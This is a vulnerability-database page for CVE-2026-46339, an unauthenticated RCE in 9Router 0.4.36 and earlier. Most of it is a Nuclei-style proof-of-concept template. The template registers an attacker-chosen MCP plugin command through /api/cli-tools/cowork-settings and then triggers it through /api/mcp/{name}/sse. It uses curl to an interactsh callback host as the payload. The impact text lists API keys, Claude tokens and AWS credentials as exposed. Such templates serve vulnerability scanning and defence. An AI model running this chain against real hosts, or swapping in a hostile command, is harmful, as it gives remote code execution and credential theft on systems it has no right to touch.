CVE-2026-46339: 9Router <= 0.4.36 - Unauthenticated RCE

2026-07-31 9Router PoC Public

Description

9Router <= 0.4.36 middleware only guards 8 explicitly listed routes, leaving /api/cli-tools/* and /api/mcp/* entirely unauthenticated. An attacker can POST to /api/cli-tools/cowork-settings to register a custom MCP plugin with attacker-controlled command and args stored verbatim into globalThis, then GET /api/mcp/{name}/sse to trigger spawn() with the stored command resulting in unauthenticated remote code execution.

PoC

id: CVE-2026-46339

info:
  name: 9Router <= 0.4.36 - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
   9Router <= 0.4.36 middleware only guards 8 explicitly listed routes, leaving /api/cli-tools/* and /api/mcp/* entirely unauthenticated. An attacker can POST to /api/cli-tools/cowork-settings to register a custom MCP plugin with attacker-controlled command and args stored verbatim into globalThis, then GET /api/mcp/{name}/sse to trigger spawn() with the stored command resulting in unauthenticated remote code execution.
  impact: |
   Full unauthenticated RCE as the 9Router process user, exposing API keys, Claude tokens, AWS credentials, and all stored MCP plugin configuration.
  remediation: |
   Upgrade to 9Router 0.4.37 or later.
  reference:
    - https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqj
    - https://nvd.nist.gov/vuln/detail/CVE-2026-46339
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-46339
    epss-score: 0.03352
    epss-percentile: 0.88075
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 3
    product: 9router
    vendor: decolua
  tags: cve,cve2026,9router,rce,mcp,unauth,critical

variables:
  plugin_name: "{{randstr}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /api/version HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "currentVersion")'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/cli-tools/cowork-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"baseUrl":"x","apiKey":"x","models":["x"],"plugins":[],"localPlugins":[],"customPlugins":[{"name":"{{plugin_name}}","command":"curl","args":["-s","{{interactsh-url}}"]}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/mcp/{{plugin_name}}/sse HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
        condition: and
# digest: 4b0a00483046022100bf89cbd2db523d033473e86bab8aa92c13e81edc7707fa12894d146c2f70d3c3022100a40aa210fb49391864a19fe3fa2ecf009b0b2e095c484c826c581d97a9db635a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities